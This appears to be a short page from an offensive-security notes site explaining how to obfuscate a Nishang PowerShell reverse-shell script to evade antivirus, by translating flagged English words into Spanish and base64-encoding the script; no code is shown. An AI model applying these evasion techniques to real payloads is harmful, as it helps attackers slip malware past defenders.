Obfuscating Files

The action of obfuscating files is to make something obscure, unclear, or unintelligible. An example of simple obfuscation is a method of converting our strings into a base64 encoded format, this is no method of encryption, and this will not break the functionality of our code, but it is a way to hide our malicious payloads from AVs on scanning for malicious strings (AVs are smart and can also deobfuscate simple b64 and scan the real string)

I will work with a simple Reverse Shell PowerShell Script from Nishang

Saving the file, immediately flagged it

A little trick I've noticed, this technique is not new, but Defender flags a lot of malicious words in English, what if we change this to Spanish?

Now let's encode the entire script into Base64, PowerShell takes a specific format of base64, so we need to set up these settings to apply it to all the text on the script

We can copy and paste this base64 blob and run it correctly

Demo:

PreviousDisable or Modify Tools NextPrivilege Escalation

Last updated 2 years ago